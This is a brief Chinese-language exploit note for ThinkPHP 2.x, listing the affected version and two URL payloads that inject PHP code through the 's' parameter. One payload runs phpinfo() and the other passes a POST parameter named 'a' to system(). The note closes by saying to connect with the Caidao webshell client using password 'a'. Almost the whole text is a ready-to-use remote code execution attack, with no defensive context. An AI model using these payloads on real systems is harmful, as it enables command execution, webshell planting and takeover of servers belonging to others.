漏洞范围

Thinkphp 2.X

漏洞POC

/index.php?s=/index/index/xxx/${@phpinfo()}

/index.php?s=/index/index/xxx/${@print(system($_POST[a]))}

菜刀连接,密码为a。